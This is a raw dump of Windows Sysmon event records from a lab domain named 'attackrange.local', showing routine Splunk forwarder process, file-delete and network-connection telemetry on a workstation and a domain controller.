07:55:27.659{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808150Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:27.659{0C1E0330-048F-60E8-0500-00000000D001}412996C:\Windows\system32\csrss.exe{0C1E0330-F56F-60EB-8D79-00000000D001}4048C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000808149Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:27.659{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F56F-60EB-8D79-00000000D001}4048C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000808148Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:27.644{0C1E0330-F56F-60EB-8D79-00000000D001}4048C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000808147Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:27.628{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A3CDD12DB173713E7CB1A653B9BF5A7E,SHA256=006BC7761EAC7BF20894D5784BA7AAC6553903234684B363726A4449F02F2E37,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000808146Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:55:27.112{0C1E0330-F56E-60EB-8C79-00000000D001}5043480C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001050130Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:28.848{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A9AAA15346713F3BBD060F20DDAA2C97,SHA256=AFB96BC193A12F3C50EE1D910DD85CA7FD8B1B004F06797D85F7312B9C12FE04,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808176Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:28.721{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=13FF198357ABC3FB62BC357FD60293D1,SHA256=B025F6FB91659B3B0A91B659F24B91848712DFF4CCC50E1593FA36EF989D1D73,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000808175Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:55:28.346{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F570-60EB-8E79-00000000D001}1868C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808174Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:28.346{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808173Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:55:28.346{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808172Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:28.346{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808171Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:55:28.346{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808170Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:28.346{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808169Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:55:28.346{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808168Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:28.346{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808167Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:55:28.346{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808166Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:28.346{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808165Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:28.346{0C1E0330-048F-60E8-0500-00000000D001}412528C:\Windows\system32\csrss.exe{0C1E0330-F570-60EB-8E79-00000000D001}1868C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000808164Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:28.346{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F570-60EB-8E79-00000000D001}1868C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000808163Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:28.332{0C1E0330-F570-60EB-8E79-00000000D001}1868C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000808162Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:28.050{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=56AD311574AD9C81BC3DA78ABBF47455,SHA256=DF465B883B963E580C356A5E25BA11F5ACE43268C07EA12987EB4FB0457B7200,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808178Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:29.768{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B2AEB5F35477FDC00DE0561AF93DBFA8,SHA256=F91FE6ACE7624CFAAC90512682BFC1506771D1A4ED56D0BCB15B7B1D68D7A7CE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050131Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:29.863{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=98EB5BBCF1B5D119A27EAA0F7F137C0F,SHA256=87D6C4C09011FAB9F412E4FB7B15A32B3762A19232DA7BDB539D5CD33EF0E136,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x8000000000000000808177Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:29.331{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=73D62946CDDAFA22D19EE10BD42E3207,SHA256=A62B436D38039501BE801E7E17B8E38781DA998D39A276062F2503D76A65EA96,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808181Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:30.800{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=53C31924F3953DCE15E2C2CC2429536C,SHA256=CD72B706C0182AFE0AC74BBCB1AAF19389C46C1B4BEF2BF0429124B3DB80AC47,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050133Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:30.863{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C5054D26569CC7D82579C7A25B2D1CAE,SHA256=1052A62A6B912A8AE99381CB718EAC56CF682D6C3892E007E7A12368BB78349A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808180Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:30.112{0C1E0330-0490-60E8-1200-00000000D001}980NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=252575FA96828354541F18E7D02E8E46,SHA256=A11CB1F47623959C90DFF20098AEFB5303B96AFAEF1D8F74CE5922E34BAA9CA2,IMPHASH=00000000000000000000000000000000falsetrue 
354300x8000000000000000808179Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:28.245{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57306-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 354300x80000000000000001050132Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:21.750{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51073-false10.0.1.12-8000- 23542300x80000000000000001050135Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:31.963{466BC892-F4EE-60EB-437D-00000000CF01}5240ATTACKRANGE\AdministratorC:\Program Files\Notepad++\notepad++.exeC:\Users\Administrator\AppData\Roaming\Notepad++\backup\AttackRangeSysmon.xml@2021-07-12_075517MD5=2FBBB8D12E29AEC43D93E8094A566839,SHA256=EAFE069978C0F434D728C018794BE1047B7D54BFCC0490B82129AFB7E157630B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050134Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:31.878{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=026C1CD08534EF0FB4D8D0B63FE2DACB,SHA256=0E086C96B81758DA8B1D7F9531155A62CDC4DDB78346B417DFA63576194476E9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808182Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:31.831{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A2A38EEC220CDA2F593CCEED876EDEDE,SHA256=A27D241391003589C565131FD3EA3A6CD6D4DC13FB5CA5A7A3E9AF6BAEA61153,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050136Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:32.879{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1A06D0F17B0C8C54636401C1BC902E11,SHA256=5A2AAD29566794CE73E4A3EC0F1BAD8BB0E18CDA6398B98247466AA8D449C4A3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808183Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:32.831{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7D015642EDA363B2E206B64D8E67EB07,SHA256=8FDEC35BFE062CCDF4FC1D02FE2D58125393EC0C736C7512A3FEBA1A7F92F0FB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050137Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:33.893{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 